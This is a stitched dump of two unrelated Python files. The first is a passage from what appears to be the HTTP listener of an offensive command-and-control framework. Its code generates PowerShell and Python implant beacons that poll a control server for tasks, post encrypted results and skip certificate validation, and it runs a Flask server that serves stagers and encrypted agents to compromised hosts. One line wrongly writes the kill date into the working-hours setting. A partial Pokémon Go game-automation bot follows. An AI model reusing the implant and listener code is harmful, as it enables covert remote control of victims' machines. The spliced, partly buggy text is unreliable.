'profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")',
'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse.decode("UTF-8")))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate))
return code
elif language.startswith('dotnet'):
version=language[6:]
f = open(self.mainMenu.installPath + "./data/agent/agent.cs",'r')
code = f.read()
f.close()
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + b64DefaultResponse.decode('UTF-8') + '"')
f = open(self.mainMenu.installPath + "./data/dotnet/compiler/data/Tasks/CSharp/Agent.task",'w')
f.write(code)
f.close()
code = helpers.get_dotnet_module_assembly_with_source(self.mainMenu.installPath,'Agent','Agent.task',version,'2')
return base64.b64encode(code)
else:
print(helpers.color(
"[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add("Cookie",\"""" + self.session_cookie + """session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $""" + helpers.generate_random_script_var_name("wc") + """.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
if ($script:MissedCheckins -eq 5){
throw "error";
}
}
}
"""
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $""" + helpers.generate_random_script_var_name("wc") + """.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
print('listeners/http.py: line 851')
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = ''.join(packets)
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETing taskings, then build the routing packet to stuff into a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket)
headers['Cookie'] = \"""" + self.session_cookie + """=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an error (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib2.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return updateServers + sendMessage
else:
print(helpers.color(
"[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color('[!] listeners/http generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
stagerURI = listenerOptions['StagerURI']['Value']
userAgent = self.options['UserAgent']['Value']
listenerName = self.options['Name']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
app = Flask(__name__)
self.app = app
@app.route('/download/<stager>')
def send_stager(stager):
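# serve a one-liner launcher from /download/<stager>; a loose substring match picks PowerShell ('po') or Python ('py')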
if 'po' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
elif 'py' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
else:
return make_response(self.default_response(), 404)
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.route('/')
@app.route('/index.html')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return make_response(self.index_page(), 200)
@app.route('/welcome.png')
def serve_index_helper():
"""
Serves image loaded by index page.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return send_from_directory(static_dir, 'welcome.png')
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
# NOTE: this can easily be moved to a parameter, another cookie value, etc.
if self.session_cookie in cookie:
listenerName = self.options['Name']['Value']
message = "[*] GET cookie value from {} : {}".format(clientIP, cookie)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith(self.session_cookie):
base64RoutingPacket = part[part.find('=') + 1:]
# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions,
clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if isinstance(results, str):
results = results.encode('UTF-8')
if results == b'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(stage, 200)
elif results.startswith(b'ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(
request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
if b'not in cache' in results:
# signal the client to restage
print(helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 200)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
requestData = request.get_data()
listenerName = self.options['Name']['Value']
message = "[*] POST request data length from {} : {}".format(clientIP, len(requestData))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if isinstance(results, str):
results = results.encode('UTF-8')
if results:
if results.startswith(b'STAGE2'):
# TODO: document the exact results structure returned
if ':' in clientIP:
clientIP = '[' + str(clientIP) + ']'
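# results has the form b'STAGE2 <sessionID>'; pull out the session ID and look up its negotiated session key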
sessionID = results.split(b' ')[1].strip().decode('UTF-8')
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
hopListenerName = request.headers.get('Hop-Name')
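# if the request was relayed through a hop listener, patch the agent with the hop's Host so it calls back through the hop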
try:
hopListener = helpers.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
except TypeError:
tempListenerOptions = listenerOptions
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
elif results[:10].lower().startswith(b'error') or results[:10].lower().startswith(b'exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
elif results.startswith(b'VALID'):
listenerName = self.options['Name']['Value']
message = "[*] Valid results returned by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 200)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
pyversion = sys.version_info
# support any version of tls
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
cipherlist = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384",
"ECDHE-RSA-AES256-SHA", "AES256-SHA256", "AES128-SHA256"]
selectciph = random.choice(cipherlist)
context.set_ciphers(selectciph)
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print(helpers.color("[!] Listener startup on port %s failed: %s " % (port, e)))
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
def generate_cookie(self):
"""
Generate Cookie
"""
chars = string.ascii_letters
cookie = helpers.random_string(random.randint(6, 16), charset=chars)
return cookie
|
__init__.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import datetime
import json
import logging
import os
import random
import re
import sys
import time
import Queue
import threading
from geopy.geocoders import GoogleV3
from pgoapi import PGoApi
from pgoapi.utilities import f2i, get_cell_ids
import cell_workers
from base_task import BaseTask
from plugin_loader import PluginLoader
from api_wrapper import ApiWrapper
from cell_workers.utils import distance
from event_manager import EventManager
from human_behaviour import sleep
from item_list import Item
from metrics import Metrics
from pokemongo_bot.event_handlers import LoggingHandler, SocketIoHandler, ColoredLoggingHandler
from pokemongo_bot.socketio_server.runner import SocketIoRunner
from pokemongo_bot.websocket_remote_control import WebsocketRemoteControl
from pokemongo_bot.base_dir import _base_dir
from pokemongo_bot.datastore import _init_database, Datastore
from worker_result import WorkerResult
from tree_config_builder import ConfigException, MismatchTaskApiVersion, TreeConfigBuilder
import inventory
from inventory import init_inventory
from sys import platform as _platform
import struct
class PokemonGoBot(Datastore):
@property
def position(self):
return self.api.actual_lat, self.api.actual_lng, self.api.actual_alt
@property
def noised_position(self):
return self.api.noised_lat, self.api.noised_lng, self.api.noised_alt
#@position.setter # these should be called through api now that gps replication is there...
#def position(self, position_tuple):
# self.api._position_lat, self.api._position_lng, self.api._position_alt = position_tuple
@property
def player_data(self):
"""
Returns the player data as received from the API.
:return: The player data.
:rtype: dict
"""
return self._player
def __init__(self, config):
# Database connection MUST be setup before migrations will work
self.database = _init_database('/data/{}.db'.format(config.username))
self.config = config
super(PokemonGoBot, self).__init__()
self.fort_timeouts = dict()
self.pokemon_list = json.load(
open(os.path.join(_base_dir, 'data', 'pokemon.json'))
)
self.item_list = json.load(open(os.path.join(_base_dir, 'data', 'items.json')))
self.metrics = Metrics(self)
self.latest_inventory = None
self.cell = None
self.recent_forts = [None] * config.forts_max_circle_size
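# rolling history of recently visited fort IDs, padded with None until enough forts have been seen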
self.tick_count = 0
self.softban = False
self.start_position = None
self.last_map_object = None
self.last_time_map_object = 0
self.logger = logging.getLogger(type(self).__name__)
self.alt = self.config.gps_default_altitude
# Make our own copy of the workers for this instance
self.workers = []
# Theading setup for file writing
self.web_update_queue = Queue.Queue(maxsize=1)
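# maxsize=1: at most one web-location update is ever pending; heartbeat() uses put_nowait and drops the request if one is already queued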
self.web_update_thread = threading.Thread(target=self.update_web_location_worker)
self.web_update_thread.start()
# Heartbeat limiting
self.heartbeat_threshold = self.config.heartbeat_threshold
self.heartbeat_counter = 0
self.last_heartbeat = time.time()
def start(self):
self._setup_event_system()
self._setup_logging()
self._setup_api()
self._load_recent_forts()
init_inventory(self)
self.display_player_info()
self._print_character_info()
if self.config.pokemon_bag_show_at_start and self.config.pokemon_bag_pokemon_info:
self._print_list_pokemon()
random.seed()
def _setup_event_system(self):
handlers = []
if self.config.logging_color:
handlers.append(ColoredLoggingHandler())
else:
handlers.append(LoggingHandler())
if self.config.websocket_server_url:
if self.config.websocket_start_embedded_server:
self.sio_runner = SocketIoRunner(self.config.websocket_server_url)
self.sio_runner.start_listening_async()
websocket_handler = SocketIoHandler(
self,
self.config.websocket_server_url
)
handlers.append(websocket_handler)
if self.config.websocket_remote_control:
remote_control = WebsocketRemoteControl(self).start()
self.event_manager = EventManager(*handlers)
self._register_events()
if self.config.show_events:
self.event_manager.event_report()
sys.exit(1)
# Registering event:
# self.event_manager.register_event("location", parameters=['lat', 'lng'])
#
# Emitting the event should be enough to add logging and send a websocket
# message:
# self.event_manager.emit('location', level='info', data={'lat': 1, 'lng': 1})
def _register_events(self):
self.event_manager.register_event(
'location_found',
parameters=('position', 'location')
)
self.event_manager.register_event('api_error')
self.event_manager.register_event('config_error')
self.event_manager.register_event('login_started')
self.event_manager.register_event('login_failed')
self.event_manager.register_event('login_successful')
self.event_manager.register_event('set_start_location')
self.event_manager.register_event('load_cached_location')
self.event_manager.register_event('location_cache_ignored')
self.event_manager.register_event(
'position_update',
parameters=(
'current_position',
'last_position',
'distance', # optional
'distance_unit' # optional
)
)
self.event_manager.register_event(
'path_lap_update',
parameters=(
'number_lap',
'number_lap_max'
)
)
self.event_manager.register_event(
'path_lap_end',
parameters=(
'duration',
'resume'
)
)
self.event_manager.register_event('location_cache_error')
self.event_manager.register_event('bot_start')
self.event_manager.register_event('bot_exit')
self.event_manager.register_event('bot_interrupted')
# sleep stuff
self.event_manager.register_event(
'next_sleep',
parameters=('time',)
)
self.event_manager.register_event(
'bot_sleep',
parameters=(
'time_hms',
'wake'
)
)
# random pause
self.event_manager.register_event(
'next_random_pause',
parameters=(
'time',
'duration'
)
)
self.event_manager.register_event(
'bot_random_pause',
parameters=(
'time_hms',
'resume'
)
)
# fort stuff
self.event_manager.register_event(
'spun_fort',
parameters=(
'fort_id',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'lured_pokemon_found',
parameters=(
'fort_id',
'fort_name',
'encounter_id',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'moving_to_fort',
parameters=(
'fort_name',
'distance'
)
)
self.event_manager.register_event(
'moving_to_lured_fort',
parameters=(
'fort_name',
'distance',
'lure_distance'
)
)
self.event_manager.register_event(
'spun_pokestop',
parameters=(
'pokestop', 'exp', 'items'
)
)
self.event_manager.register_event(
'pokestop_empty',
parameters=('pokestop',)
)
self.event_manager.register_event(
'pokestop_out_of_range',
parameters=('pokestop',)
)
self.event_manager.register_event(
'pokestop_on_cooldown',
parameters=('pokestop', 'minutes_left')
)
self.event_manager.register_event(
'unknown_spin_result',
parameters=('status_code',)
)
self.event_manager.register_event('pokestop_searching_too_often')
self.event_manager.register_event('arrived_at_fort')
# pokemon stuff
self.event_manager.register_event(
'catchable_pokemon',
parameters=(
'pokemon_id',
'spawn_point_id',
'encounter_id',
'latitude',
'longitude',
'expiration_timestamp_ms'
)
)
self.event_manager.register_event(
'pokemon_appeared',
parameters=(
'pokemon',
'ncp',
'cp',
'iv',
'iv_display',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event('no_pokeballs')
self.event_manager.register_event(
'pokemon_catch_rate',
parameters=(
'catch_rate',
'ball_name',
'berry_name',
'berry_count'
)
)
self.event_manager.register_event(
'threw_berry',
parameters=(
'berry_name',
'ball_name',
'new_catch_rate'
)
)
self.event_manager.register_event(
'threw_pokeball',
parameters=(
'throw_type',
'spin_label',
'ball_name',
'success_percentage',
'count_left'
)
)
self.event_manager.register_event(
'pokemon_capture_failed',
parameters=('pokemon',)
)
self.event_manager.register_event(
'pokemon_vanished',
parameters=(
'pokemon',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event('pokemon_not_in_range')
self.event_manager.register_event('pokemon_inventory_full')
self.event_manager.register_event(
'pokemon_caught',
parameters=(
'pokemon',
'ncp', 'cp', 'iv', 'iv_display', 'exp',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event(
'pokemon_evolved',
parameters=('pokemon', 'iv', 'cp', 'xp', 'candy')
)
self.event_manager.register_event('skip_evolve')
self.event_manager.register_event('threw_berry_failed', parameters=('status_code',))
self.event_manager.register_event('vip_pokemon')
self.event_manager.register_event('gained_candy', parameters=('quantity', 'type'))
self.event_manager.register_event('catch_limit')
# level up stuff
self.event_manager.register_event(
'level_up',
parameters=(
'previous_level',
'current_level'
)
)
self.event_manager.register_event(
'level_up_reward',
parameters=('items',)
)
# lucky egg
self.event_manager.register_event(
'used_lucky_egg',
parameters=('amount_left',)
)
self.event_manager.register_event('lucky_egg_error')
# softban
self.event_manager.register_event('softban')
self.event_manager.register_event('softban_fix')
self.event_manager.register_event('softban_fix_done')
# egg incubating
self.event_manager.register_event(
'incubate_try',
parameters=(
'incubator_id',
'egg_id'
)
)
self.event_manager.register_event(
'incubate',
parameters=('distance_in_km',)
)
self.event_manager.register_event(
'next_egg_incubates',
parameters=('eggs_left', 'eggs_inc', 'eggs')
)
self.event_manager.register_event('incubator_already_used')
self.event_manager.register_event('egg_already_incubating')
self.event_manager.register_event(
'egg_hatched',
parameters=(
'pokemon',
'cp', 'iv', 'exp', 'stardust', 'candy'
)
)
# discard item
self.event_manager.register_event(
'item_discarded',
parameters=(
'amount', 'item', 'maximum'
)
)
self.event_manager.register_event(
'item_discard_skipped',
parameters=('space',)
)
self.event_manager.register_event(
'item_discard_fail',
parameters=('item',)
)
# inventory
self.event_manager.register_event('inventory_full')
# release
self.event_manager.register_event(
'keep_best_release',
parameters=(
'amount', 'pokemon', 'criteria'
)
)
self.event_manager.register_event(
'future_pokemon_release',
parameters=(
'pokemon', 'cp', 'iv', 'below_iv', 'below_cp', 'cp_iv_logic'
)
)
self.event_manager.register_event(
'pokemon_release',
parameters=('pokemon', 'iv', 'cp', 'candy')
)
# polyline walker
self.event_manager.register_event(
'polyline_request',
parameters=('url',)
)
# cluster
self.event_manager.register_event(
'found_cluster',
parameters=(
'num_points', 'forts', 'radius', 'distance'
)
)
self.event_manager.register_event(
'arrived_at_cluster',
parameters=(
'num_points', 'forts', 'radius'
)
)
# rename
self.event_manager.register_event(
'rename_pokemon',
parameters=('old_name', 'current_name',)
)
self.event_manager.register_event(
'pokemon_nickname_invalid',
parameters=('nickname',)
)
self.event_manager.register_event(
'unset_pokemon_nickname',
parameters=('old_name',)
)
# Move To map pokemon
self.event_manager.register_event(
'move_to_map_pokemon_fail',
parameters=('message',)
)
self.event_manager.register_event(
'move_to_map_pokemon_updated_map',
parameters=('lat', 'lon')
)
self.event_manager.register_event(
'move_to_map_pokemon_teleport_to',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_encounter',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_move_towards',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_teleport_back',
parameters=('last_lat', 'last_lon')
)
self.event_manager.register_event(
'moving_to_pokemon_throught_fort',
parameters=('fort_name', 'distance','poke_name','poke_dist')
)
# cached recent_forts
self.event_manager.register_event('loaded_cached_forts')
self.event_manager.register_event('cached_fort')
self.event_manager.register_event(
'no_cached_forts',
parameters=('path', )
)
self.event_manager.register_event(
'error_caching_forts',
parameters=('path', )
)
# database shit
self.event_manager.register_event('catch_log')
self.event_manager.register_event('evolve_log')
self.event_manager.register_event('login_log')
self.event_manager.register_event('transfer_log')
self.event_manager.register_event('pokestop_log')
self.event_manager.register_event('softban_log')
def tick(self):
self.health_record.heartbeat()
self.cell = self.get_meta_cell()
now = time.time() * 1000
for fort in self.cell["forts"]:
timeout = fort.get("cooldown_complete_timestamp_ms", 0)
if timeout >= now:
self.fort_timeouts[fort["id"]] = timeout
self.tick_count += 1
# Check if session token has expired
self.check_session(self.position)
for worker in self.workers:
if worker.work() == WorkerResult.RUNNING:
return
def get_meta_cell(self):
location = self.position[0:2]
cells = self.find_close_cells(*location)
# Combine all cells into a single dict of the items we care about.
forts = []
wild_pokemons = []
catchable_pokemons = []
for cell in cells:
if "forts" in cell and len(cell["forts"]):
forts += cell["forts"]
if "wild_pokemons" in cell and len(cell["wild_pokemons"]):
wild_pokemons += cell["wild_pokemons"]
if "catchable_pokemons" in cell and len(cell["catchable_pokemons"]):
catchable_pokemons += cell["catchable_pokemons"]
# If there are forts present in the cells sent from the server or we don't yet have any cell data, return all data retrieved
if len(forts) > 1 or not self.cell:
return {
"forts": forts,
"wild_pokemons": wild_pokemons,
"catchable_pokemons": catchable_pokemons
}
# If there are no forts present in the data from the server, keep our existing fort data and only update the pokemon cells.
else:
return {
"forts": self.cell["forts"],
"wild_pokemons": wild_pokemons,
"catchable_pokemons": catchable_pokemons
}
def update_web_location(self, cells=[], lat=None, lng=None, alt=None):
# we can call the function with no arguments and still get the position
# and map_cells
if lat is None:
lat = self.api._position_lat
if lng is None:
lng = self.api._position_lng
if alt is None:
alt = self.api._position_alt
if cells == []:
location = self.position[0:2]
cells = self.find_close_cells(*location)
user_data_cells = os.path.join(_base_dir, 'data', 'cells-%s.json' % self.config.username)
try:
with open(user_data_cells, 'w') as outfile:
json.dump(cells, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
user_web_location = os.path.join(
_base_dir, 'web', 'location-%s.json' % self.config.username
)
# alt is unused atm but makes using *location easier
try:
with open(user_web_location, 'w') as outfile:
json.dump({
'lat': lat,
'lng': lng,
'alt': alt,
'cells': cells
}, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
user_data_lastlocation = os.path.join(
_base_dir, 'data', 'last-location-%s.json' % self.config.username
)
try:
with open(user_data_lastlocation, 'w') as outfile:
json.dump({'lat': lat, 'lng': lng, 'alt': alt, 'start_position': self.start_position}, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
def find_close_cells(self, lat, lng):
cellid = get_cell_ids(lat, lng)
